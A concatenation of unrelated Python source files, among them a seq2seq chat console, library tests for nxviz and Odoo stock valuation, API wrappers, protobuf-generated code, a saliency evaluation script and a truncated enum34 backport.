    def prepare_seq(seq, max_seq_len, word2idx, device):
        ''' Prepares sequence for inference: tokenize, index, add BOS/EOS,
        pad to max_seq_len and build the matching position tensor. '''
        seq = nlp(seq)
        seq = [token.text for token in seq[:max_seq_len]]
        seq = [word2idx.get(w.lower(), Constants.UNK) for w in seq]
        seq = [Constants.BOS] + seq + [Constants.EOS]
        seq = np.array(seq + [Constants.PAD] * (max_seq_len - len(seq)))
        pos = np.array([pos_i+1 if w_i != Constants.PAD else 0 for pos_i, w_i in enumerate(seq)])

        seq = torch.LongTensor(seq).unsqueeze(0)
        pos = torch.LongTensor(pos).unsqueeze(0)

        return seq.to(device), pos.to(device)

    # - Load preprocessing file for vocabulary
    prepro = torch.load(opt.prepro_file)
    src_word2idx = prepro['dict']['src']
    tgt_idx2word = {idx: word for word, idx in prepro['dict']['tgt'].items()}
    del prepro  # to save memory

    # - Prepare interactive shell
    nlp = spacy.blank('en')
    s2s = Interactive(opt)
    max_seq_len = s2s.model_opt.max_subseq_len
    print('[Info] Model opts: {}'.format(s2s.model_opt))

    # - Interact with console
    console_input = ''
    console_output = '[Seq2Seq](score:--.--) human , what do you have to say ( type \' exit \' to quit ) ?\n[Human] '
    while True:
        console_input = input(console_output)  # get user input
        if console_input == 'exit':
            break
        # Translate the user input and format the best hypothesis as the
        # next prompt.
        seq, pos = prepare_seq(console_input, max_seq_len, src_word2idx, s2s.device)
        console_output, score = s2s.translate_batch(seq, pos)
        console_output = console_output[0][0]
        score = score[0][0]
        console_output = '[Seq2Seq](score:{score:2.2f}) '.format(score=score.item()) + \
            ' '.join([tgt_idx2word.get(word, Constants.UNK_WORD) for word in console_output]) + '\n[Human] '

    print('[Seq2Seq](score:--.--) thanks for talking with me !')


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='translate.py')
    parser.add_argument('-model', required=True, help='Path to model .chkpt file')
    parser.add_argument('-prepro_file', required=True, help='Path to preprocessed data for vocab')
    parser.add_argument('-beam_size', type=int, default=5, help='Beam size')
    parser.add_argument('-no_cuda', action='store_true')

    opt = parser.parse_args()
    opt.cuda = not opt.no_cuda
    opt.n_best = 1

    interactive(opt)
python
"""Tests for encodings submodule.""" from nxviz import encodings as aes import pytest import pandas as pd from random import choice import numpy as np def categorical_series(): """Generator for categorical series.""" categories = "abc" return pd.Series([choice(categories) for _ in range(30)]) def continuous_series(): """Generator for continuous-valued series.""" values = np.linspace(0, 2, 100) return pd.Series(values) def ordinal_series(): """Generator for an ordinal series.""" values = [1, 2, 3, 4] return pd.Series(values) @pytest.fixture def too_many_categories(): """Generator for an categorical series with too many categories.""" categories = list("abcdeefghijklmnop") return pd.Series(categories) @pytest.mark.parametrize( "data, category", [ (categorical_series(), "categorical"), (continuous_series(), "continuous"), (ordinal_series(), "ordinal"), ], ) def test_data_cmap(data, category): """Test data_cmap.""" cmap, data_family = aes.data_cmap(data) assert data_family == category def test_data_cmap_errors(too_many_categories): """Test that data_cmap errors with too man categories.""" with pytest.raises(ValueError): aes.data_cmap(too_many_categories) @pytest.mark.parametrize( "data", [ (categorical_series()), (continuous_series()), (ordinal_series()), ], ) def test_data_color(data): """Test data_color.""" colors = aes.data_color(data, data) assert isinstance(colors, pd.Series) @pytest.mark.parametrize( "data", [ (continuous_series()), (ordinal_series()), ], ) def test_data_size(data): """Test data_size.""" sizes = aes.data_size(data, data) assert isinstance(sizes, pd.Series) assert np.allclose(sizes, np.sqrt(data)) @pytest.mark.parametrize( "data", [ (continuous_series()), (ordinal_series()), ], ) def test_data_linewidth(data): """Test data_linewidth.""" lw = aes.data_linewidth(data, data) assert isinstance(lw, pd.Series) assert np.allclose(lw, data)
python
''' Created by auto_sdk on 2015.04.03 ''' from aliyun.api.base import RestApi class Mkvstore20150301DescribeInstancesRequest(RestApi): def __init__(self,domain='m-kvstore.aliyuncs.com',port=80): RestApi.__init__(self,domain, port) self.InstanceIds = None self.InstanceStatus = None self.NetworkType = None self.PageNumber = None self.PageSize = None self.PrivateIpAddresses = None self.RegionId = None self.VSwitchId = None self.VpcId = None def getapiname(self): return 'm-kvstore.aliyuncs.com.DescribeInstances.2015-03-01'
python
"About API endpoints." import http.client import flask from webapp import utils blueprint = flask.Blueprint("api", __name__) @blueprint.route("") def root(): "API root." items = { "schema": { "root": {"href": utils.url_for("api_schema.root")}, "logs": {"href": utils.url_for("api_schema.logs")}, "user": {"href": utils.url_for("api_schema.user")}, "users": {"href": utils.url_for("api_schema.users")}, "about/software": { "href": utils.url_for("api_schema.about_software") } }, "about": { "software": {"href": utils.url_for("api_about.software")} } } if flask.g.current_user: items["user"] = { "username": flask.g.current_user["username"], "href": utils.url_for("api_user.display", username=flask.g.current_user["username"]) } if flask.g.am_admin: items["users"] = { "href": utils.url_for("api_user.all") } return utils.jsonify(utils.get_json(**items), schema_url=utils.url_for("api_schema.root"))
python
data_all = pandas.read_csv('../data/gapminder_all.csv', index_col='country') data_all.plot(kind='scatter', x='gdpPercap_2007', y='lifeExp_2007', s=data_all['pop_2007']/1e6) # A good place to look is the documentation for the plot function - # help(data_all.plot). # kind - As seen already this determines the kind of plot to be drawn. # x and y - A column name or index that determines what data will be placed on # the x and y axes of the plot # s - Details for this can be found in the documentation of plt.scatter. A # single number or one value for each data point. Determines the size of the # plotted points.
python
# Generated by the protocol buffer compiler.  DO NOT EDIT!
# source: POGOProtos/Networking/Responses/GetMapObjectsResponse.proto
# NOTE: this module is machine-generated; change the .proto file and rerun
# protoc instead of editing by hand.

import sys
# Py2/Py3 shim: descriptor bytes are latin-1 encoded on Python 3.
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)

_sym_db = _symbol_database.Default()


from POGOProtos.Map import MapCell_pb2 as POGOProtos_dot_Map_dot_MapCell__pb2
from POGOProtos.Map import MapObjectsStatus_pb2 as POGOProtos_dot_Map_dot_MapObjectsStatus__pb2


DESCRIPTOR = _descriptor.FileDescriptor(
  name='POGOProtos/Networking/Responses/GetMapObjectsResponse.proto',
  package='POGOProtos.Networking.Responses',
  syntax='proto3',
  serialized_pb=_b('\n;POGOProtos/Networking/Responses/GetMapObjectsResponse.proto\x12\x1fPOGOProtos.Networking.Responses\x1a\x1cPOGOProtos/Map/MapCell.proto\x1a%POGOProtos/Map/MapObjectsStatus.proto\"u\n\x15GetMapObjectsResponse\x12*\n\tmap_cells\x18\x01 \x03(\x0b\x32\x17.POGOProtos.Map.MapCell\x12\x30\n\x06status\x18\x02 \x01(\x0e\x32 .POGOProtos.Map.MapObjectsStatusb\x06proto3')
  ,
  dependencies=[POGOProtos_dot_Map_dot_MapCell__pb2.DESCRIPTOR,POGOProtos_dot_Map_dot_MapObjectsStatus__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)




_GETMAPOBJECTSRESPONSE = _descriptor.Descriptor(
  name='GetMapObjectsResponse',
  full_name='POGOProtos.Networking.Responses.GetMapObjectsResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
    _descriptor.FieldDescriptor(
      name='map_cells', full_name='POGOProtos.Networking.Responses.GetMapObjectsResponse.map_cells', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
    _descriptor.FieldDescriptor(
      name='status', full_name='POGOProtos.Networking.Responses.GetMapObjectsResponse.status', index=1,
      number=2, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=165,
  serialized_end=282,
)

# Resolve cross-file message/enum references for the two fields.
_GETMAPOBJECTSRESPONSE.fields_by_name['map_cells'].message_type = POGOProtos_dot_Map_dot_MapCell__pb2._MAPCELL
_GETMAPOBJECTSRESPONSE.fields_by_name['status'].enum_type = POGOProtos_dot_Map_dot_MapObjectsStatus__pb2._MAPOBJECTSSTATUS
DESCRIPTOR.message_types_by_name['GetMapObjectsResponse'] = _GETMAPOBJECTSRESPONSE

GetMapObjectsResponse = _reflection.GeneratedProtocolMessageType('GetMapObjectsResponse', (_message.Message,), dict(
  DESCRIPTOR = _GETMAPOBJECTSRESPONSE,
  __module__ = 'POGOProtos.Networking.Responses.GetMapObjectsResponse_pb2'
  # @@protoc_insertion_point(class_scope:POGOProtos.Networking.Responses.GetMapObjectsResponse)
  ))
_sym_db.RegisterMessage(GetMapObjectsResponse)


# @@protoc_insertion_point(module_scope)
python
import os PROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) #TEST_DATA = os.path.join(PROJECT_ROOT, "data/train_2008011514_data.json") #TEST_JSON = os.path.join(PROJECT_ROOT, "test/test.json") BERT_MODEL = "bert-base-chinese" PAD = 0 UNK = 1 CLS = 2 SEP = 3 COMMA = 117 LESS_THAN = 133 LARGER_THAN = 135
python
from samtranslator.model import PropertyType, Resource from samtranslator.model.types import is_type, is_str class SNSSubscription(Resource): resource_type = 'AWS::SNS::Subscription' property_types = { 'Endpoint': PropertyType(True, is_str()), 'Protocol': PropertyType(True, is_str()), 'TopicArn': PropertyType(True, is_str()), 'FilterPolicy': PropertyType(False, is_type(dict)) }
python
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.

from odoo.exceptions import UserError
from odoo.tests import Form
from odoo.addons.stock_account.tests.test_stockvaluation import _create_accounting_data
from odoo.addons.stock_account.tests.test_stockvaluationlayer import TestStockValuationCommon


class TestStockValuationLayerRevaluation(TestStockValuationCommon):
    """Tests for the ``stock.valuation.layer.revaluation`` wizard under
    AVCO and FIFO costing methods, including rounding and the generated
    accounting entries."""

    @classmethod
    def setUpClass(cls):
        """Configure product1's category for real-time (automated) valuation
        with dedicated input/output/valuation accounts and a stock journal."""
        super(TestStockValuationLayerRevaluation, cls).setUpClass()
        cls.stock_input_account, cls.stock_output_account, cls.stock_valuation_account, cls.expense_account, cls.stock_journal = _create_accounting_data(cls.env)
        cls.product1.write({
            'property_account_expense_id': cls.expense_account.id,
        })
        cls.product1.categ_id.write({
            'property_stock_account_input_categ_id': cls.stock_input_account.id,
            'property_stock_account_output_categ_id': cls.stock_output_account.id,
            'property_stock_valuation_account_id': cls.stock_valuation_account.id,
            'property_stock_journal': cls.stock_journal.id,
        })
        cls.product1.categ_id.property_valuation = 'real_time'

    def test_stock_valuation_layer_revaluation_avco(self):
        """AVCO: revaluing +20 on 20 units raises the average cost 3 -> 4,
        creates one revaluation layer and a balanced journal entry."""
        self.product1.categ_id.property_cost_method = 'average'
        context = {
            'default_product_id': self.product1.id,
            'default_company_id': self.env.company.id,
            'default_added_value': 0.0
        }
        # Quantity of product1 is zero, raise
        with self.assertRaises(UserError):
            Form(self.env['stock.valuation.layer.revaluation'].with_context(context)).save()

        self._make_in_move(self.product1, 10, unit_cost=2)
        self._make_in_move(self.product1, 10, unit_cost=4)

        self.assertEqual(self.product1.standard_price, 3)
        self.assertEqual(self.product1.quantity_svl, 20)

        old_layers = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc")

        self.assertEqual(len(old_layers), 2)
        self.assertEqual(old_layers[0].remaining_value, 40)

        revaluation_wizard = Form(self.env['stock.valuation.layer.revaluation'].with_context(context))
        revaluation_wizard.added_value = 20
        revaluation_wizard.account_id = self.stock_valuation_account
        revaluation_wizard.save().action_validate_revaluation()

        # Check standard price change: (60 + 20) / 20 units = 4
        self.assertEqual(self.product1.standard_price, 4)
        self.assertEqual(self.product1.quantity_svl, 20)

        # Check the creation of stock.valuation.layer
        new_layer = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc", limit=1)
        self.assertEqual(new_layer.value, 20)

        # Check the remaing value of current layers
        self.assertEqual(old_layers[0].remaining_value, 50)
        self.assertEqual(sum(slv.remaining_value for slv in old_layers), 80)

        # Check account move
        self.assertTrue(bool(new_layer.account_move_id))
        self.assertEqual(len(new_layer.account_move_id.line_ids), 2)

        self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("debit")), 20)
        self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("credit")), 20)

        credit_lines = [l for l in new_layer.account_move_id.line_ids if l.credit > 0]
        self.assertEqual(len(credit_lines), 1)
        self.assertEqual(credit_lines[0].account_id.id, self.stock_valuation_account.id)

    def test_stock_valuation_layer_revaluation_avco_rounding(self):
        """AVCO with indivisible amounts: +1 over 3 units rounds the unit
        cost to 1.33 and pushes the leftover cent into one layer (1.34)."""
        self.product1.categ_id.property_cost_method = 'average'
        context = {
            'default_product_id': self.product1.id,
            'default_company_id': self.env.company.id,
            'default_added_value': 0.0
        }
        # Quantity of product1 is zero, raise
        with self.assertRaises(UserError):
            Form(self.env['stock.valuation.layer.revaluation'].with_context(context)).save()

        self._make_in_move(self.product1, 1, unit_cost=1)
        self._make_in_move(self.product1, 1, unit_cost=1)
        self._make_in_move(self.product1, 1, unit_cost=1)

        self.assertEqual(self.product1.standard_price, 1)
        self.assertEqual(self.product1.quantity_svl, 3)

        old_layers = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc")

        self.assertEqual(len(old_layers), 3)
        self.assertEqual(old_layers[0].remaining_value, 1)

        revaluation_wizard = Form(self.env['stock.valuation.layer.revaluation'].with_context(context))
        revaluation_wizard.added_value = 1
        revaluation_wizard.account_id = self.stock_valuation_account
        revaluation_wizard.save().action_validate_revaluation()

        # Check standard price change: (3 + 1) / 3 units, rounded
        self.assertEqual(self.product1.standard_price, 1.33)
        self.assertEqual(self.product1.quantity_svl, 3)

        # Check the creation of stock.valuation.layer
        new_layer = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc", limit=1)
        self.assertEqual(new_layer.value, 1)

        # Check the remaing value of current layers
        self.assertEqual(sum(slv.remaining_value for slv in old_layers), 4)
        self.assertTrue(1.34 in old_layers.mapped("remaining_value"))

        # Check account move
        self.assertTrue(bool(new_layer.account_move_id))
        self.assertEqual(len(new_layer.account_move_id.line_ids), 2)

        self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("debit")), 1)
        self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("credit")), 1)

        credit_lines = [l for l in new_layer.account_move_id.line_ids if l.credit > 0]
        self.assertEqual(len(credit_lines), 1)
        self.assertEqual(credit_lines[0].account_id.id, self.stock_valuation_account.id)

    def test_stock_valuation_layer_revaluation_fifo(self):
        """FIFO: revaluing +20 creates a layer and journal entry but leaves
        the standard price untouched (FIFO cost comes from the oldest layer)."""
        self.product1.categ_id.property_cost_method = 'fifo'
        context = {
            'default_product_id': self.product1.id,
            'default_company_id': self.env.company.id,
            'default_added_value': 0.0
        }
        # Quantity of product1 is zero, raise
        with self.assertRaises(UserError):
            Form(self.env['stock.valuation.layer.revaluation'].with_context(context)).save()

        self._make_in_move(self.product1, 10, unit_cost=2)
        self._make_in_move(self.product1, 10, unit_cost=4)

        self.assertEqual(self.product1.standard_price, 2)
        self.assertEqual(self.product1.quantity_svl, 20)

        old_layers = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc")

        self.assertEqual(len(old_layers), 2)
        self.assertEqual(old_layers[0].remaining_value, 40)

        revaluation_wizard = Form(self.env['stock.valuation.layer.revaluation'].with_context(context))
        revaluation_wizard.added_value = 20
        revaluation_wizard.account_id = self.stock_valuation_account
        revaluation_wizard.save().action_validate_revaluation()

        self.assertEqual(self.product1.standard_price, 2)

        # Check the creation of stock.valuation.layer
        new_layer = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc", limit=1)
        self.assertEqual(new_layer.value, 20)

        # Check the remaing value of current layers
        self.assertEqual(old_layers[0].remaining_value, 50)
        self.assertEqual(sum(slv.remaining_value for slv in old_layers), 80)

        # Check account move
        self.assertTrue(bool(new_layer.account_move_id))
        # NOTE(review): assertTrue(len(...), 2) does NOT compare against 2 --
        # the second argument is just the failure message. This should
        # presumably be assertEqual, as in the AVCO tests above.
        self.assertTrue(len(new_layer.account_move_id.line_ids), 2)

        self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("debit")), 20)
        self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("credit")), 20)

        credit_lines = [l for l in new_layer.account_move_id.line_ids if l.credit > 0]
        self.assertEqual(len(credit_lines), 1)
python
# django==1.6.1 # django_facebook==5.3.1 from django.test import TestCase from django_facebook.models import FacebookCustomUser class MyTest(TestCase): def setUp(self): user = FacebookCustomUser() user.facebook_id = '123456789' user.save() def do_login(self): self.client.login(facebook_id = '123456789') def test_get_api(self): self.do_login() response = self.client.get(url) # do your asserts and other tests here
python
f = open("tags_from_tiktok.txt", 'r') data = f.read() lst = data.split('\n') tmp = [] for line in lst: if line == '': continue line = line.strip() if not (line in tmp): tmp.append(line) f.close() f = open("tags_from_tiktok.txt", 'w') for line in tmp: f.write(line + '\n') f.close()
python
import komand
from .schema import AnalyzeInput, AnalyzeOutput

# Custom imports below
import requests


class Analyze(komand.Action):
    """Komand/InsightConnect action: start (or poll) a Qualys SSL Labs
    assessment for a host via the public v2 API."""

    def __init__(self):
        super(self.__class__, self).__init__(
            name="analyze",
            description="Initialize an SSL assessment",
            input=AnalyzeInput(),
            output=AnalyzeOutput(),
        )

    def run(self, params={}):
        """Call /analyze with the action inputs and return the JSON response,
        padding optional fields so the output schema validates."""
        try:
            url = "https://api.ssllabs.com/api/v2/analyze"
            # NOTE(review): `publish` is filled from the "ip" input — this
            # looks like a copy/paste slip; confirm whether it should be
            # params.get("publish").
            # NOTE(review): the .lower() calls assume these inputs arrive as
            # strings; a missing (None) value would raise AttributeError —
            # verify the input schema supplies defaults.
            r_params = {
                "host": params.get("host"),
                "publish": params.get("ip"),
                "maxAge": params.get("max_age"),
                "all": params.get("all").lower(),
                "fromCache": params.get("from_cache").lower(),
                "startNew": params.get("start_new").lower(),
            }
            r = requests.get(url, params=r_params).json()
            # The API omits these keys while an assessment is pending/errored;
            # add empty defaults so downstream schema validation passes.
            if "endpoints" not in r:
                self.logger.info("Endpoints not found in response")
                r.update({"endpoints": []})
            if "testTime" not in r:
                self.logger.info("testTime not found in response, marking as 0")
                r.update({"testTime": 0})
            return r
        except requests.exceptions.RequestException as e:
            raise Exception(e)

    def test(self):
        """Connectivity check against the lightweight /info endpoint.

        Returns canned data matching the output schema when the API is
        reachable.  NOTE(review): implicitly returns None when r.ok is False,
        and "protocol": "Truw" looks like a typo for "True".
        """
        try:
            url = "https://api.ssllabs.com/api/v2/info"
            r = requests.get(url)
            if r.ok:
                return {
                    "testTime": 1,
                    "criteriaVersion": "True",
                    "port": 1,
                    "isPublic": True,
                    "status": "True",
                    "startTime": 1,
                    "engineVersion": "True",
                    "endpoints": [],
                    "host": "True",
                    "protocol": "Truw",
                }
        except requests.exceptions.RequestException as e:
            raise Exception(e)
python
# demo
import numpy as np
from skimage import io
import glob
from core.DUT_eval.measures import compute_ave_MAE_of_methods


def dut_eval(gt_dir, rs_dirs):
    """Evaluate predicted saliency maps against DUT-OMRON ground truth.

    gt_dir:  directory holding the ground-truth .png masks
    rs_dirs: list of result directories, one per method to evaluate

    Returns a tuple (average MAE, max F-measure) for the FIRST method in
    rs_dirs; the metrics for every method are printed along the way.
    """
    ## 0. =======set the data path=======
    print("------0. set the data path------")

    # # >>>>>>> Follows have to be manually configured <<<<<<< #
    # data_name = 'TEST-DATA' # this will be drawn on the bottom center of the figures
    # data_dir = '../test_data/' # set the data directory,
    # # ground truth and results to-be-evaluated should be in this directory
    # # the figures of PR and F-measure curves will be saved in this directory as well
    # gt_dir = 'DUT-OMRON/pixelwiseGT-new-PNG'# 'gt' # set the ground truth folder name
    # rs_dirs = ['u2net_results']#['rs1','rs2'] # set the folder names of different methods
    # # 'rs1' contains the result of method1
    # # 'rs2' contains the result of method 2
    # # we suggest to name the folder as the method names because they will be shown in the figures' legend
    lineSylClr = ['r-', 'b-']  # curve style, same size with rs_dirs (unused unless curves are plotted)
    linewidth = [2, 1]  # line width, same size with rs_dirs
    # >>>>>>> Above have to be manually configured <<<<<<< #

    gt_name_list = glob.glob(gt_dir + '/' + '*.png')  # get the ground truth file name list

    ## get directory list of predicted maps
    rs_dir_lists = []
    for i in range(len(rs_dirs)):
        rs_dir_lists.append(rs_dirs[i] + '/')
    print('\n')

    ## 1. =======compute the average MAE of methods=========
    print("------1. Compute the average MAE of Methods------")
    aveMAE, gt2rs_mae = compute_ave_MAE_of_methods(gt_name_list, rs_dir_lists)
    print('\n')
    for i in range(0, len(rs_dirs)):
        print('>>%s: num_rs/num_gt-> %d/%d, aveMAE-> %.3f' % (rs_dirs[i], gt2rs_mae[i], len(gt_name_list), aveMAE[i]))

    ## 2. =======compute the Precision, Recall and F-measure of methods=========
    # imported here rather than at module top so the MAE-only path stays light
    from core.DUT_eval.measures import compute_PRE_REC_FM_of_methods, plot_save_pr_curves, plot_save_fm_curves
    print('\n')
    print("------2. Compute the Precision, Recall and F-measure of Methods------")
    PRE, REC, FM, gt2rs_fm = compute_PRE_REC_FM_of_methods(gt_name_list, rs_dir_lists, beta=0.3)
    for i in range(0, FM.shape[0]):
        print(">>", rs_dirs[i], ":", "num_rs/num_gt-> %d/%d," % (int(gt2rs_fm[i][0]), len(gt_name_list)), "maxF->%.3f, " % (np.max(FM, 1)[i]), "meanF->%.3f, " % (np.mean(FM, 1)[i]))
    print('\n')

    ## end
    print('Done!!!')

    return aveMAE[0], np.max(FM, 1)[0]
python
# Demo: `a` is first bound to a list of strings, then rebound to a range;
# the loop prints the numbers 1 through 8, one per line.
a = ["a3", "a2", "a1"]
# print(f"{a[0]}")
a = range(1, 9)
for value in a:
    print(f"{value}")
python
"""Python Enumerations"""

# NOTE: this is the enum34 backport (version 1.1.3) of the Python 3.4 `enum`
# module, written to run on Python 2.x and 3.x from a single codebase — hence
# the many `pyver` branches and compatibility shims below.

import sys as _sys

__all__ = ['Enum', 'IntEnum', 'unique']

version = 1, 1, 3

# Interpreter version as a float, e.g. 2.7 or 3.6; drives all compat branches.
pyver = float('%s.%s' % _sys.version_info[:2])


try:
    any
except NameError:
    # any() is missing before Python 2.5; provide a pure-Python fallback.
    def any(iterable):
        for element in iterable:
            if element:
                return True
        return False

try:
    from collections import OrderedDict
except ImportError:
    OrderedDict = None

try:
    basestring
except NameError:
    # In Python 2 basestring is the ancestor of both str and unicode
    # in Python 3 it's just str, but was missing in 3.1
    basestring = str

try:
    unicode
except NameError:
    # In Python 3 unicode no longer exists (it's just str)
    unicode = str


class _RouteClassAttributeToGetattr(object):
    """Route attribute access on a class to __getattr__.

    This is a descriptor, used to define attributes that act differently
    when accessed through an instance and through a class.  Instance access
    remains normal, but access to an attribute through a class will be routed
    to the class's __getattr__ method; this is done by raising AttributeError.

    """
    def __init__(self, fget=None):
        self.fget = fget

    def __get__(self, instance, ownerclass=None):
        if instance is None:
            # Class-level access: fall through to EnumMeta.__getattr__.
            raise AttributeError()
        return self.fget(instance)

    def __set__(self, instance, value):
        raise AttributeError("can't set attribute")

    def __delete__(self, instance):
        raise AttributeError("can't delete attribute")


def _is_descriptor(obj):
    """Returns True if obj is a descriptor, False otherwise."""
    return (
            hasattr(obj, '__get__') or
            hasattr(obj, '__set__') or
            hasattr(obj, '__delete__'))


def _is_dunder(name):
    """Returns True if a __dunder__ name, False otherwise."""
    return (name[:2] == name[-2:] == '__' and
            name[2:3] != '_' and
            name[-3:-2] != '_' and
            len(name) > 4)


def _is_sunder(name):
    """Returns True if a _sunder_ name, False otherwise."""
    return (name[0] == name[-1] == '_' and
            name[1:2] != '_' and
            name[-2:-1] != '_' and
            len(name) > 2)


def _make_class_unpicklable(cls):
    """Make the given class un-picklable."""
    def _break_on_call_reduce(self, protocol=None):
        raise TypeError('%r cannot be pickled' % self)
    cls.__reduce_ex__ = _break_on_call_reduce
    cls.__module__ = '<unknown>'


class _EnumDict(dict):
    """Track enum member order and ensure member names are not reused.

    EnumMeta will use the names found in self._member_names as the
    enumeration member names.

    """
    def __init__(self):
        super(_EnumDict, self).__init__()
        self._member_names = []

    def __setitem__(self, key, value):
        """Changes anything not dundered or not a descriptor.

        If a descriptor is added with the same name as an enum member, the name
        is removed from _member_names (this may leave a hole in the numerical
        sequence of values).

        If an enum member name is used twice, an error is raised; duplicate
        values are not checked for.

        Single underscore (sunder) names are reserved.

        Note:   in 3.x __order__ is simply discarded as a not necessary piece
                leftover from 2.x

        """
        if pyver >= 3.0 and key == '__order__':
            return
        if _is_sunder(key):
            raise ValueError('_names_ are reserved for future Enum use')
        elif _is_dunder(key):
            pass
        elif key in self._member_names:
            # descriptor overwriting an enum?
            raise TypeError('Attempted to reuse key: %r' % key)
        elif not _is_descriptor(value):
            if key in self:
                # enum overwriting a descriptor?
                raise TypeError('Key already defined as: %r' % self[key])
            self._member_names.append(key)
        super(_EnumDict, self).__setitem__(key, value)


# Dummy value for Enum as EnumMeta explicity checks for it, but of course until
# EnumMeta finishes running the first time the Enum class doesn't exist.  This
# is also why there are checks in EnumMeta like `if Enum is not None`
Enum = None


class EnumMeta(type):
    """Metaclass for Enum"""
    @classmethod
    def __prepare__(metacls, cls, bases):
        # Python 3 only: makes the class body populate an _EnumDict so
        # definition order and name reuse are tracked.
        return _EnumDict()

    def __new__(metacls, cls, bases, classdict):
        # an Enum class is final once enumeration items have been defined; it
        # cannot be mixed with other types (int, float, etc.) if it has an
        # inherited __new__ unless a new __new__ is defined (or the resulting
        # class will fail).
        # On Python 2 __prepare__ is never called, so classdict may be a plain
        # dict that must be re-filtered through _EnumDict here.
        if type(classdict) is dict:
            original_dict = classdict
            classdict = _EnumDict()
            for k, v in original_dict.items():
                classdict[k] = v

        member_type, first_enum = metacls._get_mixins_(bases)
        __new__, save_new, use_args = metacls._find_new_(classdict, member_type,
                                                    first_enum)
        # save enum items into separate mapping so they don't get baked into
        # the new class
        members = dict((k, classdict[k]) for k in classdict._member_names)
        for name in classdict._member_names:
            del classdict[name]

        # py2 support for definition order
        __order__ = classdict.get('__order__')
        if __order__ is None:
            if pyver < 3.0:
                # Python 2 dicts are unordered: fall back to sorting by value
                # (or by name if the values aren't orderable).
                try:
                    __order__ = [name for (name, value) in sorted(members.items(), key=lambda item: item[1])]
                except TypeError:
                    __order__ = [name for name in sorted(members.keys())]
            else:
                __order__ = classdict._member_names
        else:
            del classdict['__order__']
            if pyver < 3.0:
                __order__ = __order__.replace(',', ' ').split()
                aliases = [name for name in members if name not in __order__]
                __order__ += aliases

        # check for illegal enum names (any others?)
        invalid_names = set(members) & set(['mro'])
        if invalid_names:
            raise ValueError('Invalid enum member name(s): %s' % (
                ', '.join(invalid_names), ))

        # save attributes from super classes so we know if we can take
        # the shortcut of storing members in the class dict
        base_attributes = set([a for b in bases for a in b.__dict__])
        # create our new Enum type
        enum_class = super(EnumMeta, metacls).__new__(metacls, cls, bases, classdict)
        enum_class._member_names_ = []               # names in random order
        if OrderedDict is not None:
            enum_class._member_map_ = OrderedDict()
        else:
            enum_class._member_map_ = {}             # name->value map
        enum_class._member_type_ = member_type

        # Reverse value->name map for hashable values.
        enum_class._value2member_map_ = {}

        # instantiate them, checking for duplicates as we go
        # we instantiate first instead of checking for duplicates first in case
        # a custom __new__ is doing something funky with the values -- such as
        # auto-numbering ;)
        if __new__ is None:
            __new__ = enum_class.__new__
        for member_name in __order__:
            value = members[member_name]
            if not isinstance(value, tuple):
                args = (value, )
            else:
                args = value
            if member_type is tuple:   # special case for tuple enums
                args = (args, )        # wrap it one more time
            if not use_args or not args:
                enum_member = __new__(enum_class)
                if not hasattr(enum_member, '_value_'):
                    enum_member._value_ = value
            else:
                enum_member = __new__(enum_class, *args)
                if not hasattr(enum_member, '_value_'):
                    enum_member._value_ = member_type(*args)
            value = enum_member._value_
            enum_member._name_ = member_name
            enum_member.__objclass__ = enum_class
            enum_member.__init__(*args)
            # If another member with the same value was already defined, the
            # new member becomes an alias to the existing one.
            for name, canonical_member in enum_class._member_map_.items():
                if canonical_member.value == enum_member._value_:
                    enum_member = canonical_member
                    break
            else:
                # Aliases don't appear in member names (only in __members__).
                enum_class._member_names_.append(member_name)
            # performance boost for any member that would not shadow
            # a DynamicClassAttribute (aka _RouteClassAttributeToGetattr)
            if member_name not in base_attributes:
                setattr(enum_class, member_name, enum_member)
            # now add to _member_map_
            enum_class._member_map_[member_name] = enum_member
            try:
                # This may fail if value is not hashable. We can't add the value
                # to the map, and by-value lookups for this value will be
                # linear.
                enum_class._value2member_map_[value] = enum_member
            except TypeError:
                pass

        # If a custom type is mixed into the Enum, and it does not know how
        # to pickle itself, pickle.dumps will succeed but pickle.loads will
        # fail.  Rather than have the error show up later and possibly far
        # from the source, sabotage the pickle protocol for this class so
        # that pickle.dumps also fails.
        #
        # However, if the new class implements its own __reduce_ex__, do not
        # sabotage -- it's on them to make sure it works correctly.  We use
        # __reduce_ex__ instead of any of the others as it is preferred by
        # pickle over __reduce__, and it handles all pickle protocols.
        unpicklable = False
        if '__reduce_ex__' not in classdict:
            if member_type is not object:
                methods = ('__getnewargs_ex__', '__getnewargs__',
                        '__reduce_ex__', '__reduce__')
                if not any(m in member_type.__dict__ for m in methods):
                    _make_class_unpicklable(enum_class)
                    unpicklable = True

        # double check that repr and friends are not the mixin's or various
        # things break (such as pickle)
